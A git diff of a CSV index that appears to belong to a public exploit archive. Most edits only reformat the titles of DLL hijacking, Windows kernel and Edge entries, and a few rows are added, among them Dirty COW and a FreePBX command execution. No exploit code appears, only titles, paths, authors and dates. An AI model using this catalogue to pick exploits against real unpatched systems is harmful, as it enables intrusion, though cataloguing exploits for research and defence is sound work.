diff --git a/files.csv b/files.csv
index b900c5841..49608aa65 100755
--- a/files.csv
+++ b/files.csv
@@ -161,7 +161,7 @@ id,file,description,date,author,platform,type,port
 165,platforms/windows/remote/165.c,"Ipswitch WS_FTP Server 4.0.2 - ALLO Remote Buffer Overflow",2004-03-23,"Hugh Mann",windows,remote,21
 166,platforms/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow",2004-03-26,VizibleSoft,windows,remote,80
 167,platforms/linux/remote/167.c,"Ethereal 0.10.0 < 0.10.2 - IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0
-168,platforms/windows/remote/168.c,"RealSecure / Blackice - iss_pam1.dll Remote Overflow",2004-03-28,Sam,windows,remote,0
+168,platforms/windows/remote/168.c,"RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow",2004-03-28,Sam,windows,remote,0
 169,platforms/hardware/remote/169.pl,"Multiple Cisco Products - Cisco Global Exploiter Tool",2004-03-28,blackangels,hardware,remote,0
 170,platforms/multiple/dos/170.c,"Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service",2004-03-26,"Rémi Denis-Courmont",multiple,dos,0
 171,platforms/linux/remote/171.c,"tcpdump - ISAKMP Identification payload Integer Overflow",2004-04-05,Rapid7,linux,remote,0
@@ -12896,67 +12896,67 @@ id,file,description,date,author,platform,type,port
 14717,platforms/php/webapps/14717.txt,"Link CMS - SQL Injection",2010-08-23,hacker@sr.gov.yu,php,webapps,0
 14718,platforms/php/webapps/14718.txt,"Joomla! Component com_zoomportfolio - SQL Injection",2010-08-23,"Chip d3 bi0s",php,webapps,0
 14720,platforms/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Buffer Overflow",2010-08-23,"James Fitts",windows,local,0
-14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 - (airpcap.dll) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
+14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
 14722,platforms/php/webapps/14722.txt,"Joomla! 1.5 - URL Redirecting",2010-08-24,Mr.MLL,php,webapps,0
-14723,platforms/windows/local/14723.c,"Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
+14723,platforms/windows/local/14723.c,"Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
 14727,platforms/hardware/local/14727.py,"Foxit Reader 4.0 - '.pdf' Jailbreak Exploit",2010-08-24,"Jose Miguel Esparza",hardware,local,0
-14726,platforms/windows/local/14726.c,"uTorrent 2.0.3 - (plugin_dll.dll) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
-14728,platforms/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking Exploit",2010-08-24,"Nicolas Krassas",windows,local,0
+14726,platforms/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
+14728,platforms/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",windows,local,0
 14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 - 'article.php' SQL Injection",2010-08-28,[]0iZy5,php,webapps,0
-14730,platforms/windows/local/14730.c,"Mozilla Firefox 3.6.8 - (dwmapi.dll) DLL Hijacking Exploit",2010-08-24,"Glafkos Charalambous ",windows,local,0
-14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 - (hhctrl.ocx) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
-14732,platforms/windows/local/14732.c,"Opera 10.61 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Nicolas Krassas",windows,local,0
-14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - wab.exe DLL Hijacking Exploit (wab32res.dll)",2010-08-24,TheLeader,windows,local,0
-14734,platforms/windows/local/14734.c,"TeamViewer 5.0.8703 - (dwmapi.dll) DLL Hijacking Exploit",2010-08-24,"Glafkos Charalambous ",windows,local,0
-14735,platforms/windows/local/14735.c,"Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-24,"Glafkos Charalambous ",windows,local,0
-14744,platforms/windows/local/14744.c,"Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
-14745,platforms/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - (wab32res.dll) DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
-14746,platforms/windows/local/14746.c,"Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
-14747,platforms/windows/local/14747.c,"TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
+14730,platforms/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous ",windows,local,0
+14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 - 'hhctrl.ocx' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
+14732,platforms/windows/local/14732.c,"Opera 10.61 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",windows,local,0
+14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll' wab.exe DLL",2010-08-24,TheLeader,windows,local,0
+14734,platforms/windows/local/14734.c,"TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous ",windows,local,0
+14735,platforms/windows/local/14735.c,"Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous ",windows,local,0
+14744,platforms/windows/local/14744.c,"Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
+14745,platforms/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
+14746,platforms/windows/local/14746.c,"Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
+14747,platforms/windows/local/14747.c,"TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
 14737,platforms/php/webapps/14737.txt,"Simple Forum PHP - Multiple Vulnerabilities",2010-08-25,arnab_s,php,webapps,0
-14739,platforms/windows/local/14739.c,"BS.Player 2.56 build 1043 - (mfc71loc.dll) DLL Hijacking Exploit",2010-08-25,diwr,windows,local,0
-14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0
-14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
+14739,platforms/windows/local/14739.c,"BS.Player 2.56 build 1043 - 'mfc71loc.dll' DLL Hijacking",2010-08-25,diwr,windows,local,0
+14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 11.0 build 4909 -  'mfc90loc.dll' DLL Hijacking",2010-08-25,diwr,windows,local,0
+14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
 14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0
-14743,platforms/windows/local/14743.c,"Avast! 5.0.594 - (mfc90loc.dll) License Files DLL Hijacking Exploit",2010-08-25,diwr,windows,local,0
+14743,platforms/windows/local/14743.c,"Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking",2010-08-25,diwr,windows,local,0
 14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking",2010-08-25,Dr_IDE,windows,local,0
-14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking Exploit",2010-08-25,Secfence,windows,local,0
+14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
 14751,platforms/windows/local/14751.txt,"Microsoft Vista - (fveapi.dll) BitLocker Drive Encryption API Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
-14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
-14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0
-14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
-14754,platforms/windows/local/14754.txt,"Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
-14755,platforms/windows/local/14755.c,"Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
-14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 - (wpcap.dll) DLL Hijacking Exploit",2010-08-25,anonymous,windows,local,0
-14758,platforms/windows/local/14758.c,"Microsoft Group Convertor - 'imm.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
+14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
+14756,platforms/windows/local/14756.c,"Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
+14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
+14754,platforms/windows/local/14754.txt,"Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
+14755,platforms/windows/local/14755.c,"Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
+14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 - 'wpcap.dll' DLL Hijacking",2010-08-25,anonymous,windows,local,0
+14758,platforms/windows/local/14758.c,"Microsoft Group Convertor - 'imm.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
 14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader < 9.x - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0
-14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking Exploit",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
-14765,platforms/windows/local/14765.c,"MediaPlayer Classic 1.3.2189.0 - DLL Hijacking Exploit (iacenc.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
-14766,platforms/windows/local/14766.c,"Skype 4.2.0.169 - (wab32.dll) DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
+14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
+14765,platforms/windows/local/14765.c,"MediaPlayer Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
+14766,platforms/windows/local/14766.c,"Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
 14767,platforms/windows/dos/14767.txt,"Flash Movie Player 1.5 - File Magic Denial of Service",2010-08-25,"Matthew Bergin",windows,dos,0
-14768,platforms/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
-14769,platforms/windows/local/14769.c,"Nvidia Driver - DLL Hijacking Exploit (nview.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
-14771,platforms/windows/local/14771.c,"Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
-14772,platforms/windows/local/14772.c,"Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
-14773,platforms/windows/local/14773.c,"Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
-14774,platforms/windows/local/14774.c,"Cisco Packet Tracer 5.2 - (wintab32.dll) DLL Hijacking Exploit",2010-08-25,CCNA,windows,local,0
-14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
+14768,platforms/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
+14769,platforms/windows/local/14769.c,"Nvidia Driver -  'nview.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
+14771,platforms/windows/local/14771.c,"Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
+14772,platforms/windows/local/14772.c,"Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
+14773,platforms/windows/local/14773.c,"Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
+14774,platforms/windows/local/14774.c,"Cisco Packet Tracer 5.2 - 'wintab32.dll' DLL Hijacking",2010-08-25,CCNA,windows,local,0
+14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
 14779,platforms/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0
-14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
-14780,platforms/windows/local/14780.c,"Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking Exploit",2010-08-25,ALPdaemon,windows,local,0
-14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
-14782,platforms/windows/local/14782.c,"Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
-14783,platforms/windows/local/14783.c,"Mozilla Thunderbird - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,h4ck3r#47,windows,local,0
-14784,platforms/windows/local/14784.c,"Adobe Extension Manager CS5 5.0.298 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,LiquidWorm,windows,local,0
-14785,platforms/windows/local/14785.c,"Adobe ExtendedScript Toolkit CS5 3.5.0.52 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,LiquidWorm,windows,local,0
-14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0
-14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0
-14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 - (iacenc.dll) DLL Hijacking Exploit",2010-08-25,LiquidWorm,windows,local,0
-14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - DLL Hijacking Exploit (wnaspi32.dll)",2010-08-25,LiquidWorm,windows,local,0
-14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - DLL Hijacking Exploit (quserex.dll)",2010-08-25,LiquidWorm,windows,local,0
-14791,platforms/windows/local/14791.c,"Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking Exploit",2010-08-25,"Mohamed Clay",windows,local,0
+14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
+14780,platforms/windows/local/14780.c,"Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking",2010-08-25,ALPdaemon,windows,local,0
+14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
+14782,platforms/windows/local/14782.c,"Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
+14783,platforms/windows/local/14783.c,"Mozilla Thunderbird - 'dwmapi.dll' DLL Hijacking",2010-08-25,h4ck3r#47,windows,local,0
+14784,platforms/windows/local/14784.c,"Adobe Extension Manager CS5 5.0.298 -  'dwmapi.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
+14785,platforms/windows/local/14785.c,"Adobe ExtendedScript Toolkit CS5 3.5.0.52 - 'dwmapi.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
+14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
+14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 -  'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
+14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
+14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
+14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 -  'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
+14791,platforms/windows/local/14791.c,"Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking",2010-08-25,"Mohamed Clay",windows,local,0
 14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Root Remote Code Execution)",2010-08-27,"Nikolas Sotiriu",linux,remote,0
-14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking Exploit",2010-08-25,"xsploited security",windows,local,0
+14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking",2010-08-25,"xsploited security",windows,local,0
 14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0
 14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - bindshell on port 2525 Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0
 14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection",2010-08-26,"Lord Tittis3000",php,webapps,0
@@ -27786,7 +27786,7 @@ id,file,description,date,author,platform,type,port
 30762,platforms/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0
 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0
 30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0
-40602,platforms/windows/dos/40602.html,"Microsoft Edge - Array.map Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
+40602,platforms/windows/dos/40602.html,"Microsoft Edge - 'Array.map' Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
 30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0
 30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0
 30768,platforms/multiple/remote/30768.txt,"IBM Websphere Application Server 5.1.1 - WebContainer HTTP Request Header Security",2007-11-15,anonymous,multiple,remote,0
@@ -27794,7 +27794,7 @@ id,file,description,date,author,platform,type,port
 30770,platforms/cgi/webapps/30770.txt,"AIDA Web - Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0
 30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller - Screens Directory HTML Injection",2007-11-15,"Jan Fry",multiple,remote,0
 30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0
-40604,platforms/windows/dos/40604.html,"Microsoft Edge - Array.join Info Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
+40604,platforms/windows/dos/40604.html,"Microsoft Edge - 'Array.join' Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
 30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0
 30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection",2007-11-17,"Aria-Security Team",asp,webapps,0
 30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial Of Service",2007-11-19,"Luigi Auriemma",linux,dos,0
@@ -28252,7 +28252,7 @@ id,file,description,date,author,platform,type,port
 31282,platforms/php/webapps/31282.txt,"XOOPS Tiny Event 1.01 - 'print' Option SQL Injection",2008-02-21,S@BUN,php,webapps,0
 31283,platforms/php/webapps/31283.txt,"PHP-Nuke Downloads Module - 'sid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
 31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module - 'cid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
-40355,platforms/multiple/dos/40355.txt,"Adobe Flash - Transform.colorTranform Getter Info Leak",2016-09-08,"Google Security Research",multiple,dos,0
+40355,platforms/multiple/dos/40355.txt,"Adobe Flash - Transform.colorTranform Getter Infomation Leak",2016-09-08,"Google Security Research",multiple,dos,0
 31285,platforms/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos,0
 31286,platforms/asp/webapps/31286.txt,"Citrix Metaframe Web Manager - 'login.asp' Cross-Site Scripting",2008-02-22,Handrix,asp,webapps,0
 31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 - 'recipeid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0
@@ -36677,9 +36677,9 @@ id,file,description,date,author,platform,type,port
 40569,platforms/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,java,webapps,0
 40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash PoC",2016-10-18,"Antonio Z.",osx,dos,0
 40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80
-40572,platforms/windows/local/40572.cs,"Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
-40573,platforms/windows/local/40573.cs,"Windows DeviceApi CMApi - PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
-40574,platforms/windows/local/40574.cs,"Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
+40572,platforms/windows/local/40572.cs,"Microsoft Windows - DFS Client Driver Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
+40573,platforms/windows/local/40573.cs,"Microsoft Windows - DeviceApi CMApi PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
+40574,platforms/windows/local/40574.cs,"Microsoft Windows - DeviceApi CMApi User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
 40576,platforms/php/webapps/40576.py,"XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-19,"Ahsan Tahir",php,webapps,0
 40577,platforms/windows/local/40577.txt,"IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation",2016-10-19,Amir.ght,windows,local,0
 40578,platforms/windows/local/40578.py,"HikVision Security Systems - Activex Buffer Overflow",2016-10-19,"Yuriy Gurkin",windows,local,0
@@ -36702,14 +36702,21 @@ id,file,description,date,author,platform,type,port
 40595,platforms/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,php,webapps,80
 40596,platforms/php/webapps/40596.txt,"SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal",2016-10-20,Sysdream,php,webapps,80
 40597,platforms/php/webapps/40597.txt,"SPIP 3.1.2 - Cross-Site Request Forgery",2016-10-20,Sysdream,php,webapps,80
-40598,platforms/windows/dos/40598.txt,"Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
-40599,platforms/windows/dos/40599.txt,"Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
-40600,platforms/windows/dos/40600.txt,"Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0
-40601,platforms/windows/dos/40601.txt,"Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0
-40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Info Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
+40598,platforms/windows/dos/40598.txt,"Microsoft Windows - 'win32k.sys' TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
+40599,platforms/windows/dos/40599.txt,"Microsoft Windows - 'win32k.sys' TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
+40600,platforms/windows/dos/40600.txt,"Microsoft Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0
+40601,platforms/windows/dos/40601.txt,"Microsoft Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0
+40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
 40605,platforms/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
-40606,platforms/windows/local/40606.cpp,"Windows Edge/IE - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
-40607,platforms/windows/local/40607.cpp,"Windows Edge/IE - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
+40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
+40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40608,platforms/windows/local/40608.cs,"Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
 40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
 40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
+40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
+40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0
+40614,platforms/php/webapps/40614.py,"FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps,0
+40617,platforms/windows/dos/40617.txt,"RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)",2016-10-21,"Alwin Peppels",windows,dos,0
